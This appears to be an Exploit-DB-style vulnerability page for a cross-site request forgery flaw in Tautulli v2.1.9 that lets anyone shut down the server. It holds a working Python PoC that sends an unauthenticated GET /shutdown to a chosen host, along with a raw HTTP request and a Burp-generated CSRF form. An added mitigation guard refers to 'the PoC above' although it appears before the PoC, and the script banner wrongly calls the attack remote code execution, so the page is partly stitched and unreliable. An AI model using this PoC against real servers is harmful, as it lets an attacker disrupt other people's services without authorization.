vendor: Tautulli
by: Ismail Tasdelen
CVE: N/A
CVSS: N/A
Title: Cross-Site Request Forgery (ShutDown)
CWE: Cross-Site Request Forgery
Product Name: Tautulli
Affected Version From: v2.1.9
Affected Version To: v2.1.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
Date: 2018

Tautulli 2.1.9 – Cross-Site Request Forgery (ShutDown)

In Tautulli v2.1.9 it has been discovered that, when the application is deployed without a user login configured, anonymous requests are accepted, and an unauthenticated (or cross-site forged) GET request can shut down the remote media server.

Mitigation:

Implement user authentication and authorization mechanisms to prevent unauthorized access and actions.
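As an added illustration of that mitigation (not code from Tautulli or from the exploit author), the request guard below shows the three server-side controls that together close this class of issue: state-changing endpoints refuse GET, require an authenticated session, and verify a per-session CSRF token plus a same-origin Origin/Referer. Session store, application origin and the sample requests are constructed for the example.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed stand-in for the server-side session store: session id -> CSRF token.
SESSIONS = {"sess-admin-1": secrets.token_hex(16)}
APP_ORIGIN = "http://tautulli.example:8181"          # assumed deployment origin
# Endpoints named on this page that change server state.
STATE_CHANGING = {"/shutdown", "/restart", "/update_check"}


def authorize_admin_action(method, path, headers, cookies, form):
    """Return (allowed, reason) for a request to a state-changing endpoint."""
    if path not in STATE_CHANGING:
        return True, "not a protected endpoint"
    # 1. Never allow state changes over GET: a bare link, an <img> tag or an
    #    auto-submitting form could otherwise trigger them from another site.
    if method != "POST":
        return False, "method not allowed"
    # 2. The caller must present a valid authenticated session cookie.
    token = SESSIONS.get(cookies.get("session"))
    if token is None:
        return False, "authentication required"
    # 3. Same-origin check on Origin (falling back to Referer); reject if absent.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False, "missing origin"
    parsed = urlparse(source)
    if "%s://%s" % (parsed.scheme, parsed.netloc) != APP_ORIGIN:
        return False, "cross-origin request rejected"
    # 4. Per-session CSRF token from the form body, compared in constant time.
    if not hmac.compare_digest(form.get("csrf_token", ""), token):
        return False, "invalid csrf token"
    return True, "ok"


if __name__ == "__main__":
    # The forged request from the PoC above: a plain GET with no session.
    print(authorize_admin_action("GET", "/shutdown",
                                 {"Referer": "http://tautulli.example:8181/home"}, {}, {}))
    # A legitimate POST from the logged-in UI carrying its CSRF token.
    print(authorize_admin_action("POST", "/shutdown", {"Origin": APP_ORIGIN},
                                 {"session": "sess-admin-1"},
                                 {"csrf_token": SESSIONS["sess-admin-1"]}))
```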

Exploit-DB raw data:

# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulnerability Type : Cross-Site Request Forgery (ShutDown)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has
# been discovered that anonymous access can be achieved in applications that do
# not have a user login area and that the remote media server can be shut down.

# PoC Python Script :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests

icon = """
 _____ __  _  _ _____ _  _ _   _   _   _   _ ___   __  ___
|_   _/  \| || |_   _| || | | | | | | | \ / (_  | /  |/ _ \
  | || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
  |_||_||_|\__/  |_|  \__/|___|___|_|   \_/ |___\/ |_\//_/
     Unauthenticated Remote Code Execution
                                   by Ismail Tasdelen
"""

print(icon)

# On Python 2, input() evaluates the typed text as an expression; fall back to
# raw_input() there so host and port are read as plain strings.
try:
    input = raw_input
except NameError:
    pass

host = input("[+] HOST: ")
port = input("[+] PORT: ")

# Unauthenticated GET to the shutdown endpoint. You can also run the restart and update_check commands.
response = requests.get("http://" + host + ":" + port + "/shutdown")

if response.status_code == 200:
    print('[✓] Success!')
else:
    print('[✗] Unsuccessful!')

# HTTP GET Request :

GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1

# CSRF PoC HTML :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>